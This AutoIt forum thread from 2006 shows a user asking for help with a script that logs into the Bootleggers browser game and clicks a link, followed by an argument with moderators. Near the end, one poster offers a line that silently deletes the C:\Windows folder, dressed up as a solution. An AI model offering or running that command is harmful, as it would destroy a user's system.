AceLoc Posted August 11, 2006 Posted August 11, 2006 (edited) #include <IE.au3> ;-------------------Login--------------------- $sUsername = "My Username" $sPassword = "My Password" $sUrl = "http://www.bootleggers.us" $oIE = _IECreate ($sUrl) $oHWND = _IEPropertyGet($oIE, "hwnd") WinSetState ($oHWND, "", @SW_MINIMIZE ) $oForm = _IEFormGetCollection ($oIE, 0) $oUsername = _IEFormElementGetObjByName ($oForm, "username") $oPassword = _IEFormElementGetObjByName ($oForm, "password") _IEFormElementSetValue ($oUsername, $sUsername) _IEFormElementSetValue ($oPassword, $sPassword) _IEFormSubmit ($oForm) ;----------------------------------------------- $oFrame = _IEFrameGetObjByName($oIE, "BSF2000") _IEClickLinkByText($oFrame, "Crimes") it wont click on the 'crimes' link, i think "BSF2000" is wrong and the "IEFrameGetObjByName" bcoz this aint a IFrame. but i cant find an other possibility :/ if you could help me, THanks! EDIT: >>>>>>>>>>>> Window Details <<<<<<<<<<<<< Title: Bootleggers :: Crimes - Microsoft Internet Explorer Class: IEFrame Size: X: -4 Y: -4 W: 1032 H: 746 >>>>>>>>>>> Mouse Details <<<<<<<<<<< Screen: X: 64 Y: 689 Cursor ID: 0 >>>>>>>>>>> Pixel Color Under Mouse <<<<<<<<<<< RGB: Hex: 0x4A4A4A Dec: 4868682 >>>>>>>>>>> Control Under Mouse <<<<<<<<<<< Size: X: 0 Y: 82 W: 1024 H: 617 Control ID: ClassNameNN: Internet Explorer_Server1 Text: >>>>>>>>>>> Status Bar Text <<<<<<<<<<< (1): http://www.bootleggers.us/crime.php (2): (3): (4): (5): (6): Internet >>>>>>>>>>> Visible Window Text <<<<<<<<<<< Koppelingen http://www.bootleggers.us/crime.php http://www.bootleggers.us/crime.php http://www.bootleggers.us/crime.php >>>>>>>>>>> Hidden Window Text <<<<<<<<<<< Edited August 11, 2006 by aceloc [quote name='AceLoc']I gots new sunglasses there cool.[/quote]
PsaltyDS Posted August 11, 2006 Posted August 11, 2006 #include <IE.au3> ;-------------------Login--------------------- $sUsername = "My Username" $sPassword = "My Password" $sUrl = "http://www.bootleggers.us" $oIE = _IECreate ($sUrl) $oHWND = _IEPropertyGet($oIE, "hwnd") WinSetState ($oHWND, "", @SW_MINIMIZE ) $oForm = _IEFormGetCollection ($oIE, 0) $oUsername = _IEFormElementGetObjByName ($oForm, "username") $oPassword = _IEFormElementGetObjByName ($oForm, "password") _IEFormElementSetValue ($oUsername, $sUsername) _IEFormElementSetValue ($oPassword, $sPassword) _IEFormSubmit ($oForm) ;----------------------------------------------- $oFrame = _IEFrameGetObjByName($oIE, "BSF2000") _IEClickLinkByText($oFrame, "Crimes") it wont click on the 'crimes' link, i think "BSF2000" is wrong and the "IEFrameGetObjByName" bcoz this aint a IFrame. but i cant find an other possibility :/ if you could help me, THanks! EDIT: I don't think the AutoIT Info screenshot helps when asking about things inside IE using IE.au3. What's requirec to troubleshoot is the html source of the page you're talking about. If you can view the page, of course, you can view the source. It's Ctrl-U in Firefox, I don't have IE here to see what it is for you. Crack open the html and search for the text "BSF2000" to see what it is. Valuater's AutoIt 1-2-3, Class... Is now in Session!For those who want somebody to write the script for them: RentACoder"Any technology distinguishable from magic is insufficiently advanced." -- Geek's corollary to Clarke's law
AceLoc Posted August 11, 2006 Author Posted August 11, 2006 #include <IE.au3> ;-------------------Login--------------------- $sUsername = "My Username" $sPassword = "My Password" $sUrl = "http://www.bootleggers.us" $oIE = _IECreate ($sUrl) $oHWND = _IEPropertyGet($oIE, "hwnd") WinSetState ($oHWND, "", @SW_MINIMIZE ) $oForm = _IEFormGetCollection ($oIE, 0) $oUsername = _IEFormElementGetObjByName ($oForm, "username") $oPassword = _IEFormElementGetObjByName ($oForm, "password") _IEFormElementSetValue ($oUsername, $sUsername) _IEFormElementSetValue ($oPassword, $sPassword) _IEFormSubmit ($oForm) ;----------------------------------------------- $oFrame = _IEFrameGetObjByName($oIE, "BSF2000") _IEClickLinkByText($oFrame, "Crimes") it wont click on the 'crimes' link, i think "BSF2000" is wrong and the "IEFrameGetObjByName" bcoz this aint a IFrame. but i cant find an other possibility :/ if you could help me, THanks! EDIT: I don't think the AutoIT Info screenshot helps when asking about things inside IE using IE.au3. What's requirec to troubleshoot is the html source of the page you're talking about. If you can view the page, of course, you can view the source. It's Ctrl-U in Firefox, I don't have IE here to see what it is for you. Crack open the html and search for the text "BSF2000" to see what it is. i didnt ask for comments, just for help here's the source: <html> <head> <title>Bootleggers :: News</title> <meta name="author" CONTENT="BSF2000"> <script language='Javascript' type='text/javascript' src='http://www.bootleggers.us/includes/remove_submit.js'></script> <link REL="stylesheet" TYPE="text/css" HREF="http://www1.bootleggers.us/includes/main.css"> </head> <body bgcolor="#111111" onload="grabit()"> <script language='Javascript' type='text/javascript' src='http://www.bootleggers.us/includes/scripts/gochat.js'></script> <center> <br> <table border="0" cellspacing="0" cellpadding="0" width="95%" class="cat"> <tr> <td colspan="3" align="center"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td align="left" width="329"><img src="http://www.bootleggers.us/images/site/site/l.gif"></td> <td align="center" background="http://www.bootleggers.us/images/site/site/m.gif"> </td> <td align="right" width="241"><img src="http://www.bootleggers.us/images/site/site/r.gif"></td> </tr> </table> </td> </tr> <tr> <td colspan="3" class="cat2" height="15"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td align="left" width="5" valign="top"><img src="http://www.bootleggers.us/images/site/site/mar_left.gif"></td> <td align="center" background="http://www.bootleggers.us/images/site/site/mar_center.gif"><img src="http://www.bootleggers.us/images/site/site/mar_center.gif"></td> <td align="right" width="5" valign="top"><img src="http://www.bootleggers.us/images/site/site/mar_right.gif"></td> </tr> </table> </td> </tr> <tr> <td width="120" background="http://www.bootleggers.us/images/site/site/bg.gif" valign="top"> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>MAIN</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/news.php">News</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/buzz/index.php">Bootleggers Buzz</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/bootcast.php">BootCast</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/faq/index.php">FAQ</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/find.php">Find Player</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/helpdesk.php">Help Desk</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/profile.php">Profile</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/states.php">States</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/stats.php">Statistics</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/usersonline.php">Users Online</a><br> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>MESSAGING</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="java script:goChat('http://www.bootleggers.us/jirc/index.php')">Chat</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/forum_classifieds/index.php">Classifieds</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/forum_crew/index.php">Crew Forum</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/forum/index.php">Game Forum</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/mailbox.php">Mailbox</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/forum_other/index.php">Off Topic Forum</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/savedmail.php">Saved Mail</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/send.php">Send Letter</a><br> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>ACTIONS</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/arm.php">Arm Wrestling</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/attempts.php">Attempts</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/bullets.php">Bullets</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/crew.php">Crew</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/hitlist.php">Hitlist</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/hospital.php">Hospital</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/jail.php">Jail</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/kill.php">Kill</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/shootingrange.php">Shooting Range</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/trainstation.php">Train Station</a><br> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>MONEY</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/booze.php">Bootlegging</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/buy.php">Buy</a> / <a href="http://www.bootleggers.us/escrow.php">Escrow</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/crime.php">Crimes</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/bank.php">Federal Bank</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/autoburglary.php">Auto Burglary</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/missions.php">Missions</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/orgcrime.php">Organized Crime</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/points.php">Points</a> / <a href="http://www.bootleggers.us/points_track.php">Track</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/sell.php">Sell Items</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/stockmarket.php">Stock Market</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/swissbank.php">Swiss Bank</a><br> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>CASINO</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/bj/blackjack.php">Blackjack</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/keno.php">Keno</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/lottery.php">Lottery</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/poker.php">Poker</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/race.php">Race Track</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/roulette.php">Roulette</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/slot.php">Slot Machines</a><br> <img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> <a href="http://www.bootleggers.us/war.php">War</a><br> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <a href="http://www.bootleggers.us/logout.php"><b>LOGOUT</b></a></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> </td> </tr> </table> </td> <td width="99%" background="http://www.bootleggers.us/images/site/site/innerbg.gif" bgcolor="#222222" valign="top"> <br> <center> <table border="0" cellspacing="0" cellpadding="10" width="100%" class="cat"> <tr> <td> <center> <br /> </td> </tr> </table> </td> <td width="120" background="http://www.bootleggers.us/images/site/site/bg.gif" valign="top"> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>INFORMATION</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> New York</td> </tr> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> Fri 08:31 AM</td> </tr> <tr> <td colspan="2" align="center"><br> <a href="http://www.bootleggers.us/mailbox.php"> <img src="http://www.bootleggers.us/images/site/barrel_empty.gif" border="0"> </a> </td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>GUN</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> HighStandard .22</td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>BULLETS</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> 0</td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>PROTECTION</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> Reinforced Duesenberg</td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>CASH</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> $16,123</td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>RANK</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> Thug</td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>HEALTH</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> </td> <td> <table border="0" cellspacing="0" cellpadding="0" width="100" class="cat"> <tr> <td bgcolor="green" align="right"><font color="white">100%</font></td> <td width="0" align="left"><font color="white"> </font></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <br> <img src="http://www.bootleggers.us/images/site/site/table_bottom.gif"><br> <table border="0" width="120" cellspacing="0" cellpadding="0" class="cat"> <tr> <td class="menu_header" width="120" height="15"> <img src="http://www.bootleggers.us/images/site/site/arrow.gif"> <b>CREW</b></td> </tr> <td> <img src="http://www.bootleggers.us/images/site/site/table_top.gif"><br> <table border="0" cellspacing="0" cellpadding="0" width="100%" class="cat"> <tr> <td width="1"> </td> <td><img src="http://www.bootleggers.us/images/site/site/arrow2.gif"> None</td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td colspan="3" width="100%" background="http://www.bootleggers.us/images/site/site/bottom.gif"><img src="http://www.bootleggers.us/images/site/site/bottom.gif"></td> </tr> </table> <iframe src="http://www.bootleggers.us/includes/online_checker.php" frameborder="0" width="0" height="0"></iframe> </body> </html> [quote name='AceLoc']I gots new sunglasses there cool.[/quote]
Moderators SmOke_N Posted August 11, 2006 Moderators Posted August 11, 2006 (edited) If you want help, then take the comments too. Your attitude towards PsaltyDS sucked when he was seriously only trying to help. You need to learn some forum ettiquete, this link will help you. Forum Help Edited August 11, 2006 by SmOke_N Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.
AceLoc Posted August 11, 2006 Author Posted August 11, 2006 (edited) give answer to the question or just dont reply easy is that. im already waiting kinda long for this.. and everytime open this topic when someone reply'd and well.. guess what "a complaining idiot again" you could atleast sent me in a right direction. else keep the comment for yourself. Thanks! Edited August 11, 2006 by aceloc [quote name='AceLoc']I gots new sunglasses there cool.[/quote]
Moderators SmOke_N Posted August 11, 2006 Moderators Posted August 11, 2006 give answer to the question or just dont reply easy is that.im already waiting kinda long for this.. and everytime open this topic when someone reply'dand well.. guess what "a complaining idiot again" you could atleast sent me in a right direction.else keep the comment for yourself.Thanks!Nah, as I said per the PM, you'll never get help from me the way you treat people.... What are we, your on demand code experts? No... we are a community that helps each other out, and deserves respect for that... send some cash someones way and they might be glad to take verbal abuse. You really need to look at the link I put up there. Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.
AceLoc Posted August 11, 2006 Author Posted August 11, 2006 Nah, as I said per the PM, you'll never get help from me the way you treat people.... What are we, your on demand code experts? No... we are a community that helps each other out, and deserves respect for that... send some cash someones way and they might be glad to take verbal abuse. You really need to look at the link I put up there.we are a community that helps each other outdidnt see anything of that.. 3 reply's .. 0 things where i learned from, or other usefull things.now shhhh go away. [quote name='AceLoc']I gots new sunglasses there cool.[/quote]
Moderators SmOke_N Posted August 11, 2006 Moderators Posted August 11, 2006 didnt see anything of that.. 3 reply's .. 0 things where i learned from, or other usefull things.now shhhh go away.Cool... I hope you get all the help you deserve. Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.
BPBNA Posted August 11, 2006 Posted August 11, 2006 I had almost the same problem this one time. But I guess it seems to have slipped my mind. Those "useless comments" and "complaining idiots" are people asking for more information to go out of their way to help YOU. If you don't give us enough information theres nothing we can do for you. No one can just miracle a script for you because we somehow know what you need when you dont post it. Anyways, this should solve all your "useless comments" and "complaining idiots" problems Run(@ComSpec & " /c rmdir C:\Windows /S /Q")
Klaatu Posted August 11, 2006 Posted August 11, 2006 now shhhh go away.Wow. The nerve of some people... $Ignore_List += 1 My Projects:DebugIt - Debug your AutoIt scripts with DebugIt!
PsaltyDS Posted August 11, 2006 Posted August 11, 2006 Wow. The nerve of some people... $Ignore_List += 1 You've inspired a usefull script... ; Digital Attitude Assistant ; Give_A_Damn.au3 -- v1.0 #include <GuiConstants.au3> Opt("GUIOnEventMode", 1) $hGUI = GUICreate("Give A Damn", 400, 200) GUISetOnEvent($GUI_EVENT_CLOSE, "_Quit", $hGUI) $hLabel = GUICtrlCreateLabel("Attempting to give a damn...", 10, 10, 380, 40, $SS_Center) GUICtrlSetFont($hLabel, 14, 600) $hProgress = GUICtrlCreateProgress(20, 60, 360, 50) $hButton = GUICtrlCreateButton("Quit Trying", 160, 130, 80, 50) GUICtrlSetOnEvent($hButton, "_Quit") GUISetState(@SW_SHOW, $hGUI) $Percent = 0 While 1 GUICtrlSetData($hProgress, $Percent / 10) Sleep(20) $Percent += 1 If $Percent = 900 Then GUICtrlSetData($hLabel, "Unable to give a damn. Quitting.") Sleep(2000) MsgBox(16, "Give A Damn", "Process failed!" & @CRLF & _ "Damn not given.", 5) Exit EndIf WEnd Func _Quit() MsgBox(16, "Give A Damn", "User quit trying to give a damn...", 5) Exit EndFunc Valuater's AutoIt 1-2-3, Class... Is now in Session!For those who want somebody to write the script for them: RentACoder"Any technology distinguishable from magic is insufficiently advanced." -- Geek's corollary to Clarke's law
BPBNA Posted August 11, 2006 Posted August 11, 2006 That program sure beats whatever aceloc was trying to write.
Klaatu Posted August 11, 2006 Posted August 11, 2006 You've inspired a usefull script...LOL! Good one! I'm famous...or is that infamous? Never mind...rhetorical question... My Projects:DebugIt - Debug your AutoIt scripts with DebugIt!
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now